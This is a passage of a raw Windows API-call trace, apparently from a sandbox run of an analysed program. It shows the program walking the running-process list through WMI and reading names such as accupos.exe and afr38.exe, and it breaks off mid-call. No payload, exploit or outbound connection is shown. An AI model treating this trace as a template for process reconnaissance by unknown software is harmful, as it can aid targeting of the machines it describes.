IWbemClassObject:Get (in: This=0x552c038, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23e2d08*=8, plFlavor=0x23e2d0c*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="accupos.exe", varVal2=0x0), pType=0x23e2d08*=8, plFlavor=0x23e2d0c*=0) returned 0x0 [0265.336] SysStringByteLen (bstr="accupos.exe") returned 0x16 [0265.336] SysStringByteLen (bstr="accupos.exe") returned 0x16 [0265.336] CoTaskMemAlloc (cb=0x4) returned 0x54ba2d8 [0265.336] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba2d8, puReturned=0x23c1fd0 | out: apObjects=0x54ba2d8*=0x552c1d0, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.337] IUnknown:QueryInterface (in: This=0x552c1d0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x552c1d0) returned 0x0 [0265.337] IUnknown:QueryInterface (in: This=0x552c1d0, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0265.337] IUnknown:QueryInterface (in: This=0x552c1d0, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0265.337] IUnknown:QueryInterface (in: This=0x552c1d0, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0265.337] IUnknown:AddRef (This=0x552c1d0) returned 0x3 [0265.337] IUnknown:QueryInterface (in: This=0x552c1d0, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.337] IUnknown:QueryInterface (in: This=0x552c1d0, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.337] IUnknown:QueryInterface (in: This=0x552c1d0, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x552c1d4) returned 0x0 [0265.337] IMarshal:GetUnmarshalClass (in: This=0x552c1d4, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.338] IUnknown:Release (This=0x552c1d4) returned 0x3 [0265.339] IUnknown:QueryInterface (in: This=0x552c1d0, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0265.339] IUnknown:Release (This=0x552c1d0) returned 0x2 [0265.339] IUnknown:QueryInterface (in: This=0x552c1d0, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x552c1d0) returned 0x0 [0265.339] IUnknown:AddRef (This=0x552c1d0) returned 0x4 [0265.339] IUnknown:Release (This=0x552c1d0) returned 0x3 [0265.339] IUnknown:Release (This=0x552c1d0) returned 0x2 [0265.339] CoTaskMemFree (pv=0x54ba2d8) [0265.339] IUnknown:AddRef (This=0x552c1d0) returned 0x3 [0265.340] IWbemClassObject:Get (in: This=0x552c1d0, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0265.340] IWbemClassObject:Get (in: This=0x552c1d0, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4156\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0265.340] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4156\"") returned 0x5e [0265.340] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4156\"") returned 0x5e [0265.340] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.340] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.340] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.340] IUnknown:Release (This=0x601a94) returned 0x1 [0265.341] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba2d8) returned 0x0 [0265.341] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba2d8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.341] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba2d8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x552a8c8) returned 0x0 [0265.341] WbemDefPath:IUnknown:Release (This=0x54ba2d8) returned 0x0 [0265.341] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a8c8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x552a8c8) returned 0x0 [0265.341] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a8c8, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.341] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a8c8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.341] WbemDefPath:IUnknown:AddRef (This=0x552a8c8) returned 0x3 [0265.341] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a8c8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.342] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a8c8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.342] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a8c8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x55282e0) returned 0x0 [0265.342] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x55282e0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.342] WbemDefPath:IUnknown:Release (This=0x55282e0) returned 0x3 [0265.342] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a8c8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.342] WbemDefPath:IUnknown:Release (This=0x552a8c8) returned 0x2 [0265.342] WbemDefPath:IUnknown:Release (This=0x552a8c8) returned 0x1 [0265.342] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a8c8, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x552a8c8) returned 0x0 [0265.342] WbemDefPath:IUnknown:AddRef (This=0x552a8c8) returned 0x3 [0265.342] WbemDefPath:IUnknown:Release (This=0x552a8c8) returned 0x2 [0265.342] WbemDefPath:IWbemPath:SetText (This=0x552a8c8, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4156\"") returned 0x0 [0265.342] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.342] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.342] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.342] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.342] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.342] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.342] IWbemClassObject:Get (in: This=0x552c1d0, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23e3594*=0, plFlavor=0x23e3598*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="afr38.exe", varVal2=0x0), pType=0x23e3594*=8, plFlavor=0x23e3598*=0) returned 0x0 [0265.343] SysStringByteLen (bstr="afr38.exe") returned 0x12 [0265.343] SysStringByteLen (bstr="afr38.exe") returned 0x12 [0265.343] IWbemClassObject:Get (in: This=0x552c1d0, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23e3594*=8, plFlavor=0x23e3598*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="afr38.exe", varVal2=0x0), pType=0x23e3594*=8, plFlavor=0x23e3598*=0) returned 0x0 [0265.343] SysStringByteLen (bstr="afr38.exe") returned 0x12 [0265.343] SysStringByteLen (bstr="afr38.exe") returned 0x12 [0265.343] CoTaskMemAlloc (cb=0x4) returned 0x54ba2d8 [0265.343] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba2d8, puReturned=0x23c1fd0 | out: apObjects=0x54ba2d8*=0x552bea0, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.344] IUnknown:QueryInterface (in: This=0x552bea0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x552bea0) returned 0x0 [0265.344] IUnknown:QueryInterface (in: This=0x552bea0, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0265.345] IUnknown:QueryInterface (in: This=0x552bea0, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0265.345] IUnknown:QueryInterface (in: This=0x552bea0, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0265.345] IUnknown:AddRef (This=0x552bea0) returned 0x3 [0265.345] IUnknown:QueryInterface (in: This=0x552bea0, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.345] IUnknown:QueryInterface (in: This=0x552bea0, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.345] IUnknown:QueryInterface (in: This=0x552bea0, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x552bea4) returned 0x0 [0265.345] IMarshal:GetUnmarshalClass (in: This=0x552bea4, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.345] IUnknown:Release (This=0x552bea4) returned 0x3 [0265.345] IUnknown:QueryInterface (in: This=0x552bea0, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0265.345] IUnknown:Release (This=0x552bea0) returned 0x2 [0265.345] IUnknown:QueryInterface (in: This=0x552bea0, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x552bea0) returned 0x0 [0265.345] IUnknown:AddRef (This=0x552bea0) returned 0x4 [0265.345] IUnknown:Release (This=0x552bea0) returned 0x3 [0265.345] IUnknown:Release (This=0x552bea0) returned 0x2 [0265.345] CoTaskMemFree (pv=0x54ba2d8) [0265.345] IUnknown:AddRef (This=0x552bea0) returned 0x3 [0265.346] IWbemClassObject:Get (in: This=0x552bea0, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0265.346] IWbemClassObject:Get (in: This=0x552bea0, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4248\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0265.346] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4248\"") returned 0x5e [0265.346] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4248\"") returned 0x5e [0265.346] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.346] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.346] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.346] IUnknown:Release (This=0x601a94) returned 0x1 [0265.347] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba2d8) returned 0x0 [0265.347] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba2d8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.347] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba2d8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x5529c18) returned 0x0 [0265.347] WbemDefPath:IUnknown:Release (This=0x54ba2d8) returned 0x0 [0265.347] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529c18, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x5529c18) returned 0x0 [0265.347] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529c18, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.347] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529c18, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.348] WbemDefPath:IUnknown:AddRef (This=0x5529c18) returned 0x3 [0265.348] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529c18, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.348] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529c18, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.348] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529c18, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5528448) returned 0x0 [0265.348] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5528448, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.348] WbemDefPath:IUnknown:Release (This=0x5528448) returned 0x3 [0265.348] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529c18, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.348] WbemDefPath:IUnknown:Release (This=0x5529c18) returned 0x2 [0265.348] WbemDefPath:IUnknown:Release (This=0x5529c18) returned 0x1 [0265.348] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529c18, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x5529c18) returned 0x0 [0265.348] WbemDefPath:IUnknown:AddRef (This=0x5529c18) returned 0x3 [0265.348] WbemDefPath:IUnknown:Release (This=0x5529c18) returned 0x2 [0265.348] WbemDefPath:IWbemPath:SetText (This=0x5529c18, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4248\"") returned 0x0 [0265.349] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.349] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.349] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.349] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.349] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, 